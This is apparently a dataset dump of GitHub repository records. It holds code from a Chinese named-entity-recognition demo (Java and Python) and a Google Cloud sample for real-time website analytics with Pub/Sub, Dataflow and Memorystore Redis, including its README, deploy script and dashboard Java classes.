webdriver.Chrome()\r\n\r\n browser.get(url)\r\n\r\n totalEle=browser.find_element_by_id('trueFinalResultCount').get_attribute('innerHTML')\r\n first=True\r\n c=1\r\n for i in range(1,int(totalEle),500):\r\n if i+499<=int(totalEle):\r\n end=i+499\r\n \r\n else:\r\n end=int(totalEle)\r\n \r\n download_once(browser,i,end,first)\r\n first=False\r\n print('正在下载第{:d}个文件: {:d} - {:d}'.format(c,i,end))\r\n downloader.update_message('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n\r\n c=c+1\r\n time.sleep(interval)\r\n\r\n browser.quit() \r\n\r\ndef startdownload_single(downloader,url,start,total):\r\n browser = webdriver.Chrome()\r\n browser.get(url)\r\n\r\n download_once(browser,start,start+total-1,True)\r\n\r\n print('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n downloader.update_message('正在下载第{:d}个文件: {:d} - {:d}'.format(1,start,start+total-1))\r\n browser.quit() "
}
] | 4 |
314894831/nerdemo | https://github.com/314894831/nerdemo | 7e5b6850146810ae30ba67db58904285d1342f71 | 121d709fdc3f32f27f48361e264b7e3dc595a54d | 0a1bafc52d23e778644d3c7c1abe7bd9f9307470 | refs/heads/master | 2023-06-16T14:02:58.319438 | 2021-07-09T02:36:27 | 2021-07-09T02:36:27 | 384,298,503 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5638655424118042,
"alphanum_fraction": 0.5655462145805359,
"avg_line_length": 31.16216278076172,
"blob_id": "c97911b772cac22ad91c226fa08ddef912ad4460",
"content_id": "e27d219f383f6a62557c9b21401cfca4eb4ce3a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1190,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 37,
"path": "/src/main/java/com/ner/demo/utils/test.java",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "package com.ner.demo.utils;\n\nimport com.ner.demo.interfaces.Rel_bilstmcrf;\n\nimport java.io.*;\n\npublic class test {\n public static void main(String[] args) throws IOException {\n Rel_bilstmcrf R1=new Rel_bilstmcrf();\n R1.lstm_train(\"C:\\\\Users\\\\Bcopton\\\\Desktop\\\\sourse_data\",\"\");\n\n\n\n// String env=\"python\";\n// File dic=new File(\".\");\n// System.out.println(dic.getCanonicalFile());\n// String model=dic.getCanonicalFile()+\"/src/main/java/com/ner/demo/python/test.py\";\n// String cmd=env+\" \"+model;\n// System.out.println(cmd);\n// Runtime run=Runtime.getRuntime();\n// try{\n// Process process=run.exec(cmd);\n// InputStream in=process.getInputStream();\n// InputStreamReader reader=new InputStreamReader(in);\n// BufferedReader br =new BufferedReader(reader);\n// StringBuffer sb=new StringBuffer();\n// String message;\n// while((message=br.readLine())!=null){\n// sb.append(message);\n// }\n// System.out.println(sb);\n// }\n// catch (IOException e){\n// e.printStackTrace();\n// }\n }\n}\n"
},
{
"alpha_fraction": 0.4934808313846588,
"alphanum_fraction": 0.5057289600372314,
"avg_line_length": 24.57575798034668,
"blob_id": "a133b19987d421ef5d8f8017126b8928fe1ca385",
"content_id": "5e5fd742486b6ab90b5f61f1908d265bec9b2be1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2633,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 99,
"path": "/src/main/java/com/ner/demo/python/transform_data.py",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "# 将原有文本转换为模型的输入文本\nimport os\nimport glob\nimport pandas as pd\nimport jieba\nimport sys\n\n\ntext_path=sys.argv[1]+\"\\*\"\ncsv_path='src/main/java/com/ner/demo/txts/ourtrain1.csv'#手工标注\n\ndef load_entity_label():\n label=set()\n entity=[]\n origin_result={}\n df=pd.read_csv(csv_path,sep=',', header=0,encoding=\"gbk\")\n for row in df.iterrows():\n label.add(row[1]['实体类型'])\n entity.append(row[1]['实体名称'])\n origin_result[row[1]['实体名称']]=row[1]['实体类型']\n return label, entity, origin_result\n\n\n#jieba分词,实体标注\ndef transform():\n origin_label, entity,origin_result=load_entity_label()\n\n #load dics\n for i in entity:\n jieba.add_word(i)\n \n # 分词\n s=[]\n paths=glob.glob(text_path)\n for p in paths:\n with open(p,'r', encoding='utf-8') as f:\n s.extend(jieba.lcut(f.read()))\n \n for ss in range(0, len(s)):\n if '\\n' in s[ss]:s[ss].replace('\\n','')\n\n\n # label transform\n with open('src/main/java/com/ner/demo/txts/chs_eng.txt','r', encoding='utf-8') as f2:\n var=f2.read()\n var=var.split('\\n')\n var_dic={}\n for v in var:\n vv=v.split('\\t')\n if len(vv)!=0:\n var_dic[vv[0]]=[vv[1], vv[2]]\n new_result=[]\n for word in s:\n if len(word)==0:\n varrr=[]\n varrr.append('')\n varrr.append('O')\n new_result.append(varrr)\n continue\n \n if len(word)==1 and word[0]=='\\n':\n varrr=[]\n varrr.append('')\n varrr.append('O')\n new_result.append(varrr)\n continue\n \n\n if word in origin_result.keys():\n begin_label=var_dic[origin_result[word]][0]\n end_label=var_dic[origin_result[word]][1]\n\n for index in range(0, len(word)):\n varrr=[]\n varrr.append(word[index])\n if index==0:\n varrr.append(begin_label)\n else:\n varrr.append(end_label)\n new_result.append(varrr)\n \n else:\n for index in range(0, len(word)):\n varrr=[]\n varrr.append(word[index])\n varrr.append('O')\n new_result.append(varrr)\n\n #write result\n with open('src/main/java/com/ner/demo/txts/jieba_result.txt','w', encoding='utf-8') as f3:\n for nr in new_result:\n # 跳过空格与回车\n # if nr[0][0]=='\\n':continue\n f3.write('{}\\t{}\\n'.format(nr[0], nr[1]))\n\n\n \n\ntransform()"
},
{
"alpha_fraction": 0.6142506003379822,
"alphanum_fraction": 0.6314496397972107,
"avg_line_length": 44.33333206176758,
"blob_id": "98eae9f28a16cf9c57d1d678e23922671ed5f574",
"content_id": "4bf0eaf281cbad1dbd04e2b7f69599470ec79274",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 441,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 9,
"path": "/src/main/java/com/ner/demo/python/test.py",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "import csv\n# 表头\nfield_order = [\"姓名\", '年龄', '性别']\nwith open(\"src/main/java/com/ner/demo/txts/test.csv\", 'w', encoding=\"utf-8\", newline='') as csvfile:\n writer = csv.DictWriter(csvfile, field_order)\n writer.writeheader()\n writer.writerow(dict(zip(field_order, [\"张三\", 20, \"男\"])))\n writer.writerow(dict(zip(field_order, [\"李四\", 10, \"男\"])))\n writer.writerow(dict(zip(field_order, [\"王五\", 30, \"男\"])))"
},
{
"alpha_fraction": 0.7796609997749329,
"alphanum_fraction": 0.790960431098938,
"avg_line_length": 24.285715103149414,
"blob_id": "52bf7eac2ca7578219afd07e8c58ad36a0a7bba0",
"content_id": "1bbfa63d37705d631c2b22129a2221ed67bc8fb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 7,
"path": "/src/main/java/com/ner/demo/interfaces/bilstmcrf.java",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "package com.ner.demo.interfaces;\n\nimport java.io.IOException;\n\npublic interface bilstmcrf {\n public abstract void lstm_train(String path1,String path2) throws IOException;\n}\n"
}
] | 4 |
GoogleCloudPlatform/redis-dataflow-realtime-analytics | https://github.com/GoogleCloudPlatform/redis-dataflow-realtime-analytics | b18b18991b2c63f3bc5fe5480634d99e0f168155 | 5c1314737d117f8d12d0436b41426a67647ad359 | 2192d5f0c8d447a365ae70dbbcfc209083e356f0 | refs/heads/master | 2023-06-26T08:00:12.371574 | 2021-04-19T02:24:47 | 2021-04-19T02:24:47 | 272,503,533 | 26 | 12 | Apache-2.0 | 2020-06-15T17:34:17 | 2023-03-28T19:24:22 | 2023-06-14T22:44:09 | Java | [
{
"alpha_fraction": 0.6839606761932373,
"alphanum_fraction": 0.7019328474998474,
"avg_line_length": 27.91176414489746,
"blob_id": "effc2c16d75ace6520e9ff30635b34e706d51f1a",
"content_id": "d480562417861fdfcd83a25d1c5e3b2a097616c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Maven POM",
"length_bytes": 2949,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 102,
"path": "/dashboard/pom.xml",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!--\n ~ Copyright 2020 Google LLC\n ~\n ~ Licensed under the Apache License, Version 2.0 (the \"License\");\n ~ you may not use this file except in compliance with the License.\n ~ You may obtain a copy of the License at\n ~\n ~ http://www.apache.org/licenses/LICENSE-2.0\n ~\n ~ Unless required by applicable law or agreed to in writing, software\n ~ distributed under the License is distributed on an \"AS IS\" BASIS,\n ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n ~ See the License for the specific language governing permissions and\n ~ limitations under the License.\n -->\n\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n\txsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\">\n\t<modelVersion>4.0.0</modelVersion>\n\t<parent>\n\t\t<groupId>org.springframework.boot</groupId>\n\t\t<artifactId>spring-boot-starter-parent</artifactId>\n\t\t<version>2.1.9.RELEASE</version>\n\t\t<relativePath/> <!-- lookup parent from repository -->\n\t</parent>\n\t<groupId>com.google.cloud.example.realtimedash</groupId>\n\t<artifactId>dashboard</artifactId>\n\t<version>0.0.1-SNAPSHOT</version>\n\t<name>dashboard</name>\n\t<description>realtime dashboard for web metrics from cloud memorystore</description>\n\n\t<properties>\n\t\t<java.version>1.8</java.version>\n\t</properties>\n\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot</groupId>\n\t\t\t<artifactId>spring-boot-starter-data-redis</artifactId>\n\t\t</dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot</groupId>\n\t\t\t<artifactId>spring-boot-starter-web</artifactId>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>redis.clients</groupId>\n\t\t\t<artifactId>jedis</artifactId>\n\t\t\t<version>2.10.2</version>\n\t\t\t<type>jar</type>\n\t\t\t<scope>compile</scope>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>com.google.auto.value</groupId>\n\t\t\t<artifactId>auto-value</artifactId>\n\t\t\t<version>1.2</version>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>joda-time</groupId>\n\t\t\t<artifactId>joda-time</artifactId>\n\t\t\t<version>2.10.5</version>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>com.google.guava</groupId>\n\t\t\t<artifactId>guava</artifactId>\n\t\t\t<version>30.1.1-jre</version>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>com.fasterxml.jackson.datatype</groupId>\n\t\t\t<artifactId>jackson-datatype-joda</artifactId>\n\t\t\t<version>2.9.5</version>\n\t\t</dependency>\n\n\t</dependencies>\n\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot</groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin</artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<mainClass>com.google.cloud.solutions.realtimedash.dashboard.DashboardApplication\n\t\t\t\t\t</mainClass>\n\t\t\t\t\t<layout>ZIP</layout>\n\t\t\t\t</configuration>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage</goal>\n\t\t\t\t\t\t</goals>\n\t\t\t\t\t</execution>\n\t\t\t\t</executions>\n\t\t\t</plugin>\n\t\t</plugins>\n\t</build>\n\n</project>\n"
},
{
"alpha_fraction": 0.7349498271942139,
"alphanum_fraction": 0.7466555237770081,
"avg_line_length": 34.17647171020508,
"blob_id": "9c04b1941c312e7b0786f6d57317228f00aaa211",
"content_id": "84222b4785a0e41febfd9a43bfcadade8ad1e83f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1196,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 34,
"path": "/processor/deploy_dataflow.sh",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n#\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nmvn clean compile exec:java \\\n -Dexec.mainClass=com.google.cloud.solutions.realtimedash.pipeline.MetricsCalculationPipeline \\\n -Dexec.cleanupDaemonThreads=false \\\n -Dmaven.test.skip=true \\\n -Dexec.args=\" \\\n--project=$PROJECT_ID \\\n--runner=DataflowRunner \\\n--stagingLocation=gs://$TEMP_GCS_BUCKET/stage/ \\\n--tempLocation=gs://$TEMP_GCS_BUCKET/temp/ \\\n--inputTopic=projects/$PROJECT_ID/topics/$APP_EVENTS_TOPIC \\\n--workerMachineType=n1-standard-4 \\\n--region=$REGION_ID \\\n--subnetwork=regions/$REGION_ID/subnetworks/$VPC_NETWORK_NAME \\\n--redisHost=$REDIS_IP \\\n--redisPort=6379 \\\n--streaming\\\n\"\n"
},
{
"alpha_fraction": 0.7321076989173889,
"alphanum_fraction": 0.7373604774475098,
"avg_line_length": 26.690908432006836,
"blob_id": "498be551d8aeadf626bc04819e496fb66d47060d",
"content_id": "b098553e2736b5bcfe9fdceb3f0741fc429717f3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1523,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 55,
"path": "/dashboard/src/main/java/com/google/cloud/solutions/realtimedash/dashboard/OverlapMetric.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.dashboard;\n\nimport com.google.auto.value.AutoValue;\nimport com.google.common.collect.ImmutableSet;\n\n@AutoValue\npublic abstract class OverlapMetric {\n\n public abstract ImmutableSet<String> getDimensions();\n\n public abstract Double getMetric();\n\n\n public static Builder builder() {\n return new AutoValue_OverlapMetric.Builder();\n }\n\n @AutoValue.Builder\n public abstract static class Builder {\n\n public abstract Builder setMetric(Double newMetric);\n\n public Builder setMetric(float newMetric) {\n return setMetric((double) newMetric);\n }\n\n public Builder setMetric(int newMetric) {\n return setMetric((double) newMetric);\n }\n\n public Builder setMetric(long newMetric) {\n return setMetric((double) newMetric);\n }\n\n public abstract Builder setDimensions(ImmutableSet<String> dimensions);\n\n public abstract OverlapMetric build();\n }\n}\n"
},
{
"alpha_fraction": 0.7252061367034912,
"alphanum_fraction": 0.732273280620575,
"avg_line_length": 43.68421173095703,
"blob_id": "f7f043dfcf4e324515d6d60fad1631e1bea02f77",
"content_id": "c05342f23eff7910c371ee0ff4a865cb94d0d59c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8492,
"license_type": "permissive",
"max_line_length": 222,
"num_lines": 190,
"path": "/README.md",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "## Realtime Analytics using Dataflow and Cloud Memorystore (Redis)\n\nIn today’s fast-paced world, there is emphasis on getting instant insights.\nTypical use-cases involve SaaS operators providing real-time metrics for their KPIs\nor marketeers' need for quick insights on performance of their offers or experiments on the website.\n\nThis solution will demonstrate how to build a real-time website analytics dashboard on GCP.\n\n\n### Components\n\n**User events / Message bus** provides system decoupling, [Pub/Sub](https://cloud.google.com/pubsub)\n is a fully managed message/event bus and provides an easy way to handle the fast click-stream \n generated by typical websites. The click-stream contains signals which can be processed to derive \n insights in real time. \n\n**Metrics processing pipeline** is required to process the click-stream from Pub/Sub into the \n metrics database. [Dataflow](https://cloud.google.com/dataflow) will be used, which is a \n serverless, fully managed processing service supporting real-time streaming jobs. \n\n**Metrics Database**, needs to be an in-memory database to support real-time use-cases. \n Some common web analytic metrics are unique visitors, number of active experiments, conversion rate \n of each experiment, etc. The common theme is to calculate uniques, i.e. Cardinality counting, \n although from a marketeer's standpoint a good estimation is sufficient, the \n [HyperLogLog](https://en.wikipedia.org/wiki/HyperLogLog) algorithm is an efficient solution to the \n count-unique problem by trading off some accuracy.\n \n[Cloud Memorystore (Redis)](https://cloud.google.com/memorystore/docs/redis/redis-overview) provides \n a slew of in-built functions for sets and cardinality measurement, alleviating the need to perform \n them in code. \n \nThe analytics reporting and visualization makes the reports available to the marketeer easily. \nA **Spring dashboard application** is used for demo purposes only. The application uses \n[Jedis](https://github.com/xetorthio/jedis) client to access metrics from Redis using \n[`scard`](https://redis.io/commands/scard) and \n[`sinterstore`](https://redis.io/commands/sinterstore) commands for identifying user overlap and \nother cardinality values. It then uses Javascript based web-ui to render graphs using \n[Google Charts](https://developers.google.com/chart) library.\n\n## Video Tutorial\n| Part 1 | Part 2 |\n| ------ | ------ |\n| [](https://www.youtube.com/watch?v=7NvgleOy480) | [](https://www.youtube.com/watch?v=FyDNn7gZNi4) |\n\n## Quick Start\n[](https://console.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/redis-dataflow-realtime-analytics.git)\n\n### Setup Environment\n1. Clone this repository\n ```shell script\n git clone https://github.com/GoogleCloudPlatform/redis-dataflow-realtime-analytics.git\n cd redis-dataflow-realtime-analytics\n ```\n2. Update and activate all environment variables in `set_variables.sh`\n ```shell script\n source set_variables.sh\n ```\n3. Enable required Cloud products\n ```shell script\n gcloud services enable \\\n compute.googleapis.com \\\n pubsub.googleapis.com \\\n redis.googleapis.com \\\n dataflow.googleapis.com \\\n storage-component.googleapis.com\n ```\n### Create Pub/Sub Topic\nPub/Sub is a global message bus enabling easy message consumption in a decoupled fashion.\nCreate a Pub/Sub topic to receive application instrumentation messages\n```shell script\ngcloud pubsub topics create $APP_EVENTS_TOPIC --project $PROJECT_ID\n```\n### Create VPC network\nProtecting the Redis instance is important as it does not provide any protections from external entities.\n\n1. Creating a sepate VPC network with external ingress blocked by a firewall provides basic security for the instance. \n ```shell script\n gcloud compute networks create $VPC_NETWORK_NAME \\\n --subnet-mode=auto \\\n --bgp-routing-mode=regional\n ```\n2. Create Firewall rule to enable SSH\n ```shell script\n gcloud compute firewall-rules create allow-internal-ssh \\\n --network $VPC_NETWORK_NAME \\\n --allow tcp:22,icmp\n ```\n \n### Configure Cloud Memorystore\n[Cloud Memorystore](https://cloud.google.com/memorystore) provides a fully managed [Redis](https://redis.io/) database.\nRedis is a NoSQL In-Memory database, which offers comprehensive in-built functions for\n [SETs](https://redis.io/commands#set) operations, \n including efficient HLL operations for cardinality measurement. \n\n1. Create Redis instance in Memorystore. \n ```shell script\n gcloud redis instances create $REDIS_NAME \\\n --size=1 \\\n --region=$REGION_ID \\\n --zone=\"$ZONE_ID\" \\\n --network=$VPC_NETWORK_NAME \\\n --tier=standard\n ```\n > Be patient, this can take some time.\n2. Capture instance's IP to configure the Dataflow and Visualization application \n ```shell script\n export REDIS_IP=\"$(gcloud redis instances describe $REDIS_NAME --region=$REGION_ID \\\n | grep host \\\n | sed 's/host: //')\"\n ```\n\n### Start Analytics pipeline\nThe analytic metrics pipeline will read click-stream messages from Pub/Sub and update metrics in the Redis database in real-time. The visualization application can then use the Redis database for the dashboard.\n\n1. Create Cloud Storage bucket for temporary and staging area for the pipeline\n ```shell script\n gsutil mb -l $REGION_ID -p $PROJECT_ID gs://$TEMP_GCS_BUCKET\n ```\n2. Launch the pipeline using [Maven](https://apache.org/maven)\n ```shell script\n cd processor\n ``` \n ```shell script\n mvn clean compile exec:java \\\n -Dexec.mainClass=com.google.cloud.solutions.realtimedash.pipeline.MetricsCalculationPipeline \\\n -Dexec.cleanupDaemonThreads=false \\\n -Dmaven.test.skip=true \\\n -Dexec.args=\" \\\n --streaming \\\n --project=$PROJECT_ID \\\n --runner=DataflowRunner \\\n --stagingLocation=gs://$TEMP_GCS_BUCKET/stage/ \\\n --tempLocation=gs://$TEMP_GCS_BUCKET/temp/ \\\n --inputTopic=projects/$PROJECT_ID/topics/$APP_EVENTS_TOPIC \\\n --workerMachineType=n1-standard-4 \\\n --region=$REGION_ID \\\n --subnetwork=regions/$REGION_ID/subnetworks/$VPC_NETWORK_NAME \\\n --redisHost=$REDIS_IP \\\n --redisPort=6379\"\n ```\n\n### Start the dummy website events generator\nThe dummy event generator is a Python executable, which needs to keep running, this can be achieved by launching the generator in a __separate shell session__.\n\n1. Create and initialize a new python3 virtual environment (you need to have `pyhton3-venv` package)\n ```shell script\n python3 -m venv ~/generator-venv\n source ~/generator-venv/bin/activate \n pip install -r loggen/requirements.txt \n ```\n2. Run the logs generator\n ```shell script\n python loggen/message_generator.py \\\n --topic $APP_EVENTS_TOPIC \\\n --project-id $PROJECT_ID \\\n --enable-log true\n ```\n\n### Run the Visualization Engine\nUse the simple reporting application located in `dashboard/` folder, built using SpringBoot and simple HTML+JS based UI. \n\nThe application reads the metrics from the Redis database and makes it available to the dashboard UI.\nThe Application server needs to be on the same VPC network as the Redis server, to achieve this for demo purposes, \nwe will use a Proxy VM to tunnel the ports to Cloud Shell VM, as its not on the same network.\n \n1. Create a VM to act as proxy\n ```shell script\n gcloud compute instances create proxy-server \\\n --zone $ZONE_ID \\\n --image-family debian-10 \\\n --image-project debian-cloud \\\n --network $VPC_NETWORK_NAME\n ``` \n2. Start SSH port forwarding\n ```shell script\n gcloud compute ssh proxy-server --zone $ZONE_ID -- -N -L 6379:$REDIS_IP:6379 -4 &\n ```\n3. Start the Visualization Spring boot application.\n ```shell script\n cd dashboard/\n mvn clean compile package spring-boot:run\n ```\n4. Click on the  icon to open [web preview](https://cloud.google.com/shell/docs/using-web-preview),\n to access the application's web-ui in the browser.\n \n a. Click \"Preview on port 8080\" \n b. On the dashboard, click \"Auto Update\" which will keep the dashboard fresh.\n \n __Sample Dashbaord__\n \n"
},
{
"alpha_fraction": 0.7516930103302002,
"alphanum_fraction": 0.7577125430107117,
"avg_line_length": 28.53333282470703,
"blob_id": "27e57ea39e0a52701e597228943551e192c71796",
"content_id": "6d579f0042b993c14d522911311a8bdc247a38f4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1329,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 45,
"path": "/processor/src/main/java/com/google/cloud/solutions/realtimedash/pipeline/MetricsPipelineOptions.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.pipeline;\n\nimport org.apache.beam.sdk.options.Description;\nimport org.apache.beam.sdk.options.PipelineOptions;\nimport org.apache.beam.sdk.options.Validation;\n\n/**\n * A Streaming pipeline option for the Metrics calculation pipeline.\n */\npublic interface MetricsPipelineOptions extends PipelineOptions {\n\n @Description(\"The Cloud Pub/Sub topic to read from.\")\n @Validation.Required\n String getInputTopic();\n\n void setInputTopic(String value);\n\n @Description(\"Redis Host\")\n @Validation.Required\n String getRedisHost();\n\n void setRedisHost(String redisHost);\n\n @Description(\"Redis Port\")\n @Validation.Required\n Integer getRedisPort();\n\n void setRedisPort(Integer redisPort);\n}\n"
},
{
"alpha_fraction": 0.7122641801834106,
"alphanum_fraction": 0.71552973985672,
"avg_line_length": 35.02614212036133,
"blob_id": "e67d718729577a08dfb79708182b838cf9354d03",
"content_id": "c5bde5ce1f3c266f47c7b2e0e1472051176b6744",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5512,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 153,
"path": "/dashboard/src/main/java/com/google/cloud/solutions/realtimedash/dashboard/TimeseriesMetricsController.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.dashboard;\n\nimport static com.google.common.collect.ImmutableSet.toImmutableSet;\n\nimport com.google.common.base.Joiner;\nimport com.google.common.collect.ImmutableList;\nimport com.google.common.collect.ImmutableSet;\nimport com.google.common.collect.Sets;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Set;\nimport java.util.stream.IntStream;\nimport org.joda.time.DateTime;\nimport org.joda.time.DateTimeZone;\nimport org.joda.time.Duration;\nimport org.springframework.web.bind.annotation.GetMapping;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RequestParam;\nimport org.springframework.web.bind.annotation.RestController;\nimport redis.clients.jedis.Jedis;\n\n@RestController\n@RequestMapping(\"/metrics/timeseries\")\npublic class TimeseriesMetricsController {\n\n private static final String REDIS_NIL = \"(nil)\";\n private static final String DEFAULT_REPORT_TIME_MINUTE = \"10\";\n\n @GetMapping(\"/visits\")\n public ImmutableList<TimeSeriesMetric> visits(Jedis redisClient,\n @RequestParam(required = false, defaultValue = DEFAULT_REPORT_TIME_MINUTE) int lastMinutes) {\n DateTime[] times = timePatternForLastMinutes(lastMinutes);\n\n List<String> values = redisClient\n .mget(TimeSeriesKeyBuilder.forPrefix(\"visitCounter\").buildTimeKeys(times));\n\n ImmutableList.Builder<TimeSeriesMetric> visitsMetricBuilder = ImmutableList.builder();\n\n for (int index = 0; index < times.length; index++) {\n int value = getIntValue(values.get(index));\n\n visitsMetricBuilder\n .add(TimeSeriesMetric.builder().setTimestamp(times[index]).setMetric(value).build());\n }\n\n return visitsMetricBuilder.build();\n }\n\n private Integer getIntValue(String value) {\n return (value == null || value.equals(REDIS_NIL)) ? 0 : Integer.valueOf(value);\n }\n\n @GetMapping(\"/users\")\n public ImmutableList<TimeSeriesMetric> users(Jedis redisClient,\n @RequestParam(required = false, defaultValue = DEFAULT_REPORT_TIME_MINUTE) int lastMinutes) {\n ImmutableList.Builder<TimeSeriesMetric> usersMetricBuilder = ImmutableList.builder();\n\n TimeSeriesKeyBuilder keyBuilder = TimeSeriesKeyBuilder.forPrefix(\"hll_dthr\");\n\n for (DateTime time : timePatternForLastMinutes(lastMinutes)) {\n usersMetricBuilder.add(\n TimeSeriesMetric\n .builder()\n .setTimestamp(time)\n .setMetric(redisClient.pfcount(keyBuilder.buildTimeKey(time)))\n .build());\n }\n\n return usersMetricBuilder.build();\n }\n\n @GetMapping(\"/experiments\")\n public ImmutableList<TimeSeriesMetric> recentExperiments(Jedis redisClient,\n @RequestParam(required = false, defaultValue = DEFAULT_REPORT_TIME_MINUTE) int lastMinutes) {\n TimeSeriesKeyBuilder keyBuilder = TimeSeriesKeyBuilder\n .forPrefix(\"set_experiments_experiments\");\n\n ImmutableList.Builder<TimeSeriesMetric> experimentsMetricBuilder = ImmutableList.builder();\n\n for (DateTime time : timePatternForLastMinutes(lastMinutes)) {\n long value = redisClient.scard(keyBuilder.buildTimeKey(time));\n\n experimentsMetricBuilder.add(\n TimeSeriesMetric.builder()\n .setTimestamp(time)\n .setMetric(value)\n .build());\n }\n\n return experimentsMetricBuilder.build();\n }\n\n @GetMapping(\"/variantsOverlap\")\n public ImmutableSet<OverlapMetric> variantOverlap(Jedis redisClient) {\n Set<String> variants = redisClient.keys(\"set_var_*\");\n\n if (variants == null || variants.size() == 0) {\n return ImmutableSet.of();\n }\n\n return Sets.combinations(variants, 2)\n .stream()\n .map(variantCombination -> variantCombination.toArray(new String[0]))\n .map(variantCombination -> {\n\n String sinterStoreKey = Joiner.on(\"-\").join(\"overlap_\", variantCombination);\n\n redisClient.sinterstore(sinterStoreKey, 